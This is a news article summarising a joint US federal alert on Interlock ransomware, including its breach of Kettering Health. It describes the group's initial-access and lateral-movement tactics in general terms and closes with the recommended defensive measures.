Feds: Interlock ransomware targeting critical industries with evasive tactics

Interlock ransomware threat actors are aggressively targeting a host of US and European industries with unique attack methods designed to evade typical preventative defense strategies, according to a joint federal alert.

The FBI, Department of Health and Human Services (HHS), Cybersecurity and Infrastructure Security Agency (CIA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) warn Interlock first gains access through a drive-by download from compromised, legitimate websites and social engineering tactics.

Network defenders in the healthcare sector and other critical infrastructure organizations are being urged to review the shared tactics and indicators of compromise (IOCs) to reduce the risk to the enterprise.

Multiple healthcare victims have already been compromised, including Kettering Health. In June, the health system confirmed Interlock breached the network and exfiltrated data in a May cyberattack against its 14 medical centers and120 outpatient care sites.

Statements from Kettering Health officials throughout the incident noted Interlock ransomware attack disrupted phone lines, most of its IT applications, and “patient appointments where IT applications are a necessary part of care plans.”

“In healthcare, these events often range from 10 to 20 days in duration,” said Kettering Health CEO Mike Gentry, in a May 23 update.

Interlock tactics and recommended remediation

Researchers first discovered Interlock ransomware in September 2024, leveraging several unique tactics to gain access to victim networks. In some effective attacks, the group has been seen using a customized backdoor, masking the malicious nature of their payloads, and other tailored methods to increase the likelihood of success.

“Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software,” according to the alert.

In some instances, the alert warns the actors have been observed using a “ClickFix” social engineering technique. This method aims to trick users into “fixing” an issue on their network, but instead, they will execute the malicious payload.

After gaining initial access, the threat actors leverage a host of methods to move laterally across the network to plan their further attacks, steal credentials, and proliferate to connected systems on the network.

Further, the FBI has observed Interlock leveraging a series of PowerShell commands to download a credential stealer and keylogger binary after initial access. The alert shows “the credential stealer collects login information and associated URLs for victims’ online accounts, while the keylogger dynamic link library (DLL) logs users’ keystrokes.”

Researchers have also found the successful Interlock ransomware infections will execute other information stealers to harvest credentials for lateral movement and privilege escalation. The stolen credentials and Remote Desktop Protocol (RDP) allow the attackers to move between systems, as well as tools like AnyDesk and PuTTY.

Interlock has also been observed compromising domain administrator accounts to gain additional privileges.

The ransomware targets Windows and Linux operating systems, as well as virtual machines.

The joint alert shares indicators of compromise (IOCs), additional attack methods and tools, and other tactics for network defenders to review. All organizations are being urged to implement the shared recommended remediation methods to reduce the chance of exploit and or the impact of a potential attack. The recommended actions align with previously released cross-sector cybersecurity performance goals (CPGs).

Network defenders can prevent Interlock from gaining initial access by leveraging a DNS filter and web access firewalls to block users from accessing malicious applications. NIST password standards should guide requirements for all user accounts, as well as the use of multi-factor authentication.

“Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement,” according to the joint alert. “Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim.”

Urgent defenses and collaborative action needed

The unique and evasive tactics of Interlock ransomware, as demonstrated by successful compromises like that of Kettering Health, underscore the immediate need for robust defense strategies. The joint alert from the FBI, HHS, CISA, and MS-ISAC highlights the importance of collaborative intelligence sharing in combating sophisticated threats like Interlock ransomware. All organizations are urged to meticulously review the shared indicators of compromise and proactively adopt the recommended remediation methods. This includes preventing initial access through DNS filtering and web access firewalls, training users to spot social engineering attempts, mitigating known vulnerabilities through timely patching, segmenting networks to restrict lateral movement, and implementing strong identity and access management policies with mandatory multifactor authentication.

By actively applying these crucial measures, network defenders can not only protect their own enterprises but also contribute to a stronger collective defense against this persistent threat. Further resources and advisories are available at stopransomware.gov as part of the ongoing effort to combat various ransomware variants and threat actors.